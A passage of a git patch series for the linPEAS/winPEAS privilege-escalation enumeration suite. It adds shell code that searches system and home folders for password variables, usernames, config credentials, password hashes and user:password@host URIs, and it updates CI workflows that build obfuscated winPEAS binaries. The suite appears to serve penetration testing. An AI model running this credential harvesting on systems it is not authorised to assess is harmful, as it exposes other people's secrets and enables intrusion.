+ echo "" + + ##-- IF) Find possible files with passwords + print_2title "Finding possible password variables inside key folders (limit 140)" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Finding possible password in config files" + ppicf=`find $HOMESEARCH /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" 2>/dev/null` + printf "%s\n" "$ppicf" | while read f; do + if [ "`grep -EiI 'passwd.*|creden.*' \"$f\" 2>/dev/null`" ]; then + echo $ITALIC" $f"$NC + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" + + ##-- IF) Find possible files with usernames + print_2title "Finding 'username' string inside key folders (limit 70)" + timeout 150 grep -RiIE "username.*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + echo "" + + ##-- IF) Specific hashes inside files + print_2title "Searching specific hashes inside files - less false positives (limit 70)" + regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' + regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' + regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' + regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' + regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' + regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' + regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," + echo "" + fi + + if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Specific hashes inside files + print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" + regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' + regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' + regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' + regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," + echo "" + fi + + if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then + ##-- IF) Find URIs with user:password@hoststrings + print_2title "Finding URIs with user:password@host inside key folders" + timeout 150 find /var/www $backup_folders_row /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" $HOMESEARCH 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + echo "" + fi +fi \ No newline at end of file From c33777747e3963af580e5c53d3996dd6e4481863 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Tue, 13 Jul 2021 12:08:15 +0200 Subject: [PATCH 5/7] Update CONTRIBUTING.md --- CONTRIBUTING.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 8bad788..0627d75 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -6,7 +6,7 @@ If you wan tto make a suggestion for linpeas or winpeas please use **[github iss ## Searching for files with sensitive information From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** file. -If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). +If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). You can find examples of how to contribute to this file inside the file. Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud. ## Specific LinPEAS additions From d4c26cf5869fc8aa750c2d2650bc8bc195c48b16 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Tue, 13 Jul 2021 12:08:50 +0200 Subject: [PATCH 6/7] Update CI-linpeas_master_test.yml --- .github/workflows/CI-linpeas_master_test.yml | 3 --- 1 file changed, 3 deletions(-) diff --git a/.github/workflows/CI-linpeas_master_test.yml b/.github/workflows/CI-linpeas_master_test.yml index d1d8dad..32f9790 100644 --- a/.github/workflows/CI-linpeas_master_test.yml +++ b/.github/workflows/CI-linpeas_master_test.yml @@ -4,9 +4,6 @@ on: pull_request: branches: - master - paths: - - 'build_lists\sensitive_files.yaml' - - 'linPEAS\**' workflow_dispatch: From 303eb56632019bbfef1e096f489a25218d536f0e Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Tue, 13 Jul 2021 12:45:53 +0200 Subject: [PATCH 7/7] winpeas flows --- .github/workflows/CI-winpeas_PR.yml | 25 ---- .github/workflows/CI-winpeas_dev_test.yml | 121 ++++++++++++++++++ ...ld_test.yml => CI-winpeas_master_test.yml} | 10 +- 3 files changed, 126 insertions(+), 30 deletions(-) delete mode 100644 .github/workflows/CI-winpeas_PR.yml create mode 100644 .github/workflows/CI-winpeas_dev_test.yml rename .github/workflows/{CI-winpeas_build_test.yml => CI-winpeas_master_test.yml} (97%) diff --git a/.github/workflows/CI-winpeas_PR.yml b/.github/workflows/CI-winpeas_PR.yml deleted file mode 100644 index 4c29951..0000000 --- a/.github/workflows/CI-winpeas_PR.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: CI-winpeas_PR - -on: - push: - branches: - - winpeas_dev - - linpeas_dev - - master - paths: - - 'build_lists\sensitive_files.yaml' - - 'winPEAS\winPEASexe\**' - -jobs: - build: - runs-on: windows-latest - - steps: - - uses: actions/checkout@v2 - - - uses: actions/checkout@v2 - - name: pull-request - uses: repo-sync/pull-request@v2 - with: - destination_branch: "master" - github_token: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/CI-winpeas_dev_test.yml b/.github/workflows/CI-winpeas_dev_test.yml new file mode 100644 index 0000000..c111f2b --- /dev/null +++ b/.github/workflows/CI-winpeas_dev_test.yml @@ -0,0 +1,121 @@ +name: CI-winpeas_dev_test + +on: + push: + branches: + - winpeas_dev + + workflow_dispatch: + +jobs: + + Build_and_test_winpeas_dev: + runs-on: windows-latest + + # environment variables + env: + Solution_Path: 'winPEAS\winPEASexe\winPEAS.sln' + Configuration: 'Release' + DotFuscatorGeneratedPath: 'winPEAS\winPEASexe\binaries\Obfuscated Releases\Dotfuscated' + + steps: + # checkout + - name: Checkout + uses: actions/checkout@v2 + + # Add MSBuild to the PATH: https://github.com/microsoft/setup-msbuild + - name: Setup MSBuild.exe + uses: microsoft/setup-msbuild@v1.0.2 + + # Setup NuGet + - name: Setup NuGet.exe + uses: nuget/setup-nuget@v1 + + # Restore the packages for testing + - name: Restore the application + run: nuget restore $env:Solution_Path + + # build + - name: run MSBuild + run: msbuild $env:Solution_Path + + # Execute all unit tests in the solution + - name: Execute unit tests + run: dotnet test $env:Solution_Path + + # Build & update all versions + - name: Build all versions + run: | + echo "build x64" + msbuild -m $env:Solution_Path /t:Rebuild /p:Configuration=$env:Configuration /p:Platform="x64" + + echo "build x86" + msbuild -m $env:Solution_Path /t:Rebuild /p:Configuration=$env:Configuration /p:Platform="x86" + + echo "build Any CPU" + msbuild -m $env:Solution_Path /t:Rebuild /p:Configuration=$env:Configuration /p:Platform="Any CPU" + + # Copy the built versions + - name: Copy all versions + run: | + echo "copy x64" + cp winPEAS\winPEASexe\winPEAS\bin\x64\$env:Configuration\winPEAS.exe winPEAS\winPEASexe\binaries\x64\$env:Configuration\winPEASx64.exe + + echo "copy x86" + cp winPEAS\winPEASexe\winPEAS\bin\x86\$env:Configuration\winPEAS.exe winPEAS\winPEASexe\binaries\x86\$env:Configuration\winPEASx86.exe + + echo "copy Any" + cp winPEAS\winPEASexe\winPEAS\bin\$env:Configuration\winPEAS.exe winPEAS\winPEASexe\binaries\$env:Configuration\winPEASany.exe + + # build obfuscated versions + - name: Setup DotFuscator + run: | + 7z x winPEAS\winPEASexe\Dotfuscator\DotfuscatorCE.zip + whoami + mkdir -p $env:USERPROFILE\AppData\Local\"PreEmptive Solutions"\"Dotfuscator Community Edition"\6.0 -erroraction 'silentlycontinue' + cp DotfuscatorCE\license\* $env:USERPROFILE\AppData\Local\"PreEmptive Solutions"\"Dotfuscator Community Edition"\6.0\ + + # build obfuscated versions + - name: Build obfuscated versions + run: | + DotfuscatorCE\dotfuscator.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\x64.xml" + DotfuscatorCE\dotfuscator.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\x86.xml" + DotfuscatorCE\dotfuscator.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\any.xml" + + + # copy the files + - name: Copy Dotfuscator generated files + run: | + cp $env:DotFuscatorGeneratedPath\x64\winPEASx64.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64.exe" + cp $env:DotFuscatorGeneratedPath\x86\winPEASx86.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86.exe" + cp $env:DotFuscatorGeneratedPath\any\winPEASany.exe "winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany.exe" + + # Git add + - name: Create local changes + run: | + git add winPEAS\winPEASexe\binaries\Release\* + git add winPEAS\winPEASexe\binaries\x64\* + git add winPEAS\winPEASexe\binaries\x86\* + git add "winPEAS\winPEASexe\binaries\Obfuscated Releases\*.exe" + + # Git commit + - name: Commit results to Github + run: | + git config --local user.email "ci@winpeas.com" + git config --global user.name "CI-winpeas" + git commit -m "winpeas binaries auto update" -a --allow-empty + + # Git push + - name: Push changes + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + branch: master + + # PR + - uses: actions/checkout@v2 + - name: pull-request + uses: repo-sync/pull-request@v2 + with: + destination_branch: "master" + github_token: ${{ secrets.PULL_REQUEST_TOKEN }} diff --git a/.github/workflows/CI-winpeas_build_test.yml b/.github/workflows/CI-winpeas_master_test.yml similarity index 97% rename from .github/workflows/CI-winpeas_build_test.yml rename to .github/workflows/CI-winpeas_master_test.yml index 9961169..3c6db6c 100644 --- a/.github/workflows/CI-winpeas_build_test.yml +++ b/.github/workflows/CI-winpeas_master_test.yml @@ -1,15 +1,15 @@ -name: CI-winpeas_test +name: CI-winpeas_master_test on: - push: + pull_request: branches: - - winpeas_dev + - master workflow_dispatch: -jobs: +jobs: - Build_and_test_winpeas: + Build_and_test_winpeas_master: runs-on: windows-latest # environment variables